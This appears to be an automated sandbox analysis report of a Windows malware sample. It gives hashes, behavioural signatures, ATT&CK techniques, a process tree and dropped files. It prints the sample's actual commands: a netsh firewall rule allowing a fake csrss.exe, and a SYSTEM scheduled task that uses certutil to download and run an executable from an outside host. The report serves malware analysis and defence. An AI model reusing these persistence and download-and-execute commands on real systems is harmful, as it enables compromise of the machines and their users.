988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059

Analysis

max time kernel
51s
max time network
138s
platform
windows7_x64
resource
win7-20220414-en
submitted
24-05-2022 00:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe
Size

3.8MB
MD5

795847175d72c68819a2f8e0dfed1e98
SHA1

00c46c3540cbaa0b5a3e072ad0cd6a35fad49102
SHA256

988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059
SHA512

316eb4693aa242f94ee9071d6a82db81ec851dd40cee6879c2ea924fed7c3ae9ab02e7cab5a7c51231a54c3ffc4df3536a5ff5b99902f8a8af440232357c9d5a

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1992 bcdedit.exe
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220524024008.cab makecab.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1044 schtasks.exe
1552 schtasks.exe

pid	process
1992	bcdedit.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220524024008.cab	makecab.exe

pid	process
1044	schtasks.exe
1552	schtasks.exe

Modifies data under HKEY_USERS 9 IoCs

Processes:

netsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe

pid process

1668
1688 988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

description pid process

Token: SeDebugPrivilege 1668
Token: SeImpersonatePrivilege 1668

pid	process
1668
1688	988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe

description	pid	process
Token: SeDebugPrivilege	1668
Token: SeImpersonatePrivilege	1668

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.execmd.exe

description	pid	process	target process
PID 1688 wrote to memory of 392	1688	988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe	cmd.exe
PID 1688 wrote to memory of 392	1688	988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe	cmd.exe
PID 1688 wrote to memory of 392	1688	988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe	cmd.exe
PID 1688 wrote to memory of 392	1688	988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe	cmd.exe
PID 392 wrote to memory of 1376	392	cmd.exe	netsh.exe
PID 392 wrote to memory of 1376	392	cmd.exe	netsh.exe
PID 392 wrote to memory of 1376	392	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe
"C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe"
1⤵
PID:1668

C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe
"C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:1756

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1044

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1552

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:1560

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:1992

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524024008.log C:\Windows\Logs\CBS\CbsPersist_20220524024008.cab
1⤵
- Drops file in Windows directory
PID:1496

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies data under HKEY_USERS
PID:1376

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
0ff91f4b377c7c2863203db082008dab

SHA1
f4591579374e34b4f191b4d545a750699c11dbbf

SHA256
183fb0810a5341949beb501c48f62b9a138ff407b3b227ba90463e316bbf312d

SHA512
e186af107a3f117251c2d4d67fe837f07fe7fb12404cd2825bb3b1d37a4a900bda39e72ce7a007358f6c593cfb298103d1de2ec89c1db1f9584a0b5e29bff611

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.7MB

MD5
468fb7226d87c7a20ffeaaaa0e590f4d

SHA1
0646fac7c0165b5ccc6a565bacff771e9ffb05af

SHA256
50adcfb85cb32b2ed157c9561445756a18477912e34f23e20d1f0ddfa2890840

SHA512
ef75e3ee2102d03fcc77254e78fd493e44b15fefea3b10c8e8461fbaf6d6c689068da71026aa1e3b9bb2148a59ec0b96245836ac780e82d3146e8e9b0bf93921

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.6MB

MD5
b53c990c073ffd126959a8499713f64f

SHA1
76bc78df558aeb57fb7c018f8698a53ec2cc0d05

SHA256
7b27621418cfaa198bdd3ce0e54025c349c0f2ba9fa59305dbed992e98462e8d

SHA512
83e6a411a9b919a7f59d684beae8a3f4e08c9f8fc4476db0b1da95045bbbeaf5221b673023d9c2ef19f59e1463de913313535b9ab8e56d15233b77ad8c97c7aa

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.6MB

MD5
5264952e8737ac15f20d3c98ab2344b7

SHA1
42ae15090a07cb484fa4591b7deb7ec8d8c46e8a

SHA256
435fd2f77b2d2f8b327530f155477f4a1aad18248f42714473ab25e54054e7cc

SHA512
1e25bbd388d79a8e7e144c273f6bb355810c26e13d34b161250c7981fba05e76698c8990671d47e278461b59afae3d2c5626c6469b46d371c9864cc979dc007e

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.4MB

MD5
5b4a47b5df2d614121b2c0da2e81415d

SHA1
ff32f21822d61d50c7e9d1cec7196cb68461630b

SHA256
9a7f5dd2aaf997582f9fb4e063541fd7f169ce36dba8c5e70d8cb14514813311

SHA512
d3bf36567ceadc9e6e8f06f4913f6def28e381ce7e0591d3e3c976c300f82ec204086094cff3d7c47a8cbb9a208f2966402b3fefa6857b05566f34da8858b664

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
1.5MB

MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.6MB

MD5
549c507534224ca632ee2d4a0e291732

SHA1
95baa4be0e2fe53d8e6f02ee74e86d73c459e613

SHA256
245c7f5db1cc4dae389d184dfdf390be83dca3a3278664e6ffc954bb5f2d2f57

SHA512
c2e52efa31a997e3bcb1929009160378c93c91f3137eb9757cd748049b666ad5236f81e4228b511e12cdc555c416fad45f5a12be82b443eac26187b3a5437101

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.6MB

MD5
549c507534224ca632ee2d4a0e291732

SHA1
95baa4be0e2fe53d8e6f02ee74e86d73c459e613

SHA256
245c7f5db1cc4dae389d184dfdf390be83dca3a3278664e6ffc954bb5f2d2f57

SHA512
c2e52efa31a997e3bcb1929009160378c93c91f3137eb9757cd748049b666ad5236f81e4228b511e12cdc555c416fad45f5a12be82b443eac26187b3a5437101

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.9MB

MD5
bd2abca95ca004e9f2ab84adfe740d7e

SHA1
aa4c990c6c55ad27c1423eb90e3594a260cd6f54

SHA256
1888a8b32a40a33dc3aaa79f13f4c76d9af705705f63769b2a0d2ddb5e5462d0

SHA512
4385bf23fef7ce2b7e08cf4d35fbf970d82dd9e6e94dc82398c1e311a3925a9a634b69dec9fecf02383be8d9b0bad6bb1882455320b5319e646e1234cd1f5e31

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
1.8MB

MD5
5d7f1c8130bdd8a0457a3a1fe6bb211d

SHA1
1cbd0607150f3c05824cb65f62d5d1da33fa47e1

SHA256
5c5d5f0291e5b78f301e1c301aa2be5cd0395b6b9170e24f8eedf75fff279428

SHA512
1df4a0cfac57236fb132f379a546b95c4694fa6b8d75822f7d3612cd135faacc8d335b4709aeba0a5ea7bb260c52d070b8fa82d99ef247cfa6994f28f2468813

Download Submit
\Windows\rss\csrss.exe
Filesize
1.7MB

MD5
387f2e9dc0514b1638fcd819a91c13cd

SHA1
f3b83839314ace18f2e856b05df47d5ee61fbdeb

SHA256
dd0182e658924a5c239917096aa61983d0a690c55877eeeb7772dbaccfe750d2

SHA512
1c1c2900a9caf69e8c7952559614c9d826426ebe014887c0a32a2884cd110137afe98acbf0fc87762dd69a833305278c7f3e93fa73238cd76b59fa9b66551d80

Download Submit
memory/392-61-0x0000000000000000-mapping.dmp

Download
memory/1376-63-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp

Filesize
8KB

Download
memory/1376-62-0x0000000000000000-mapping.dmp

Download
memory/1668-54-0x0000000002580000-0x0000000002926000-memory.dmp

Filesize
3.6MB

Download
memory/1668-55-0x0000000002580000-0x0000000002926000-memory.dmp

Filesize
3.6MB

Download
memory/1668-56-0x0000000002930000-0x0000000003026000-memory.dmp

Filesize
7.0MB

Download
memory/1668-57-0x0000000000400000-0x0000000000B10000-memory.dmp

Filesize
7.1MB

Download
memory/1688-58-0x0000000002450000-0x00000000027F6000-memory.dmp

Filesize
3.6MB

Download
memory/1688-60-0x0000000000400000-0x0000000000B10000-memory.dmp

Filesize
7.1MB

Download
memory/1688-59-0x0000000002450000-0x00000000027F6000-memory.dmp

Filesize
3.6MB

Download
memory/1756-68-0x0000000002480000-0x0000000002826000-memory.dmp

Filesize
3.6MB

Download
memory/1756-66-0x0000000000000000-mapping.dmp

Download
memory/1756-72-0x0000000000400000-0x0000000000B10000-memory.dmp

Filesize
7.1MB

Download
memory/1756-71-0x0000000002480000-0x0000000002826000-memory.dmp

Filesize
3.6MB

Download
memory/1992-84-0x0000000000000000-mapping.dmp

Download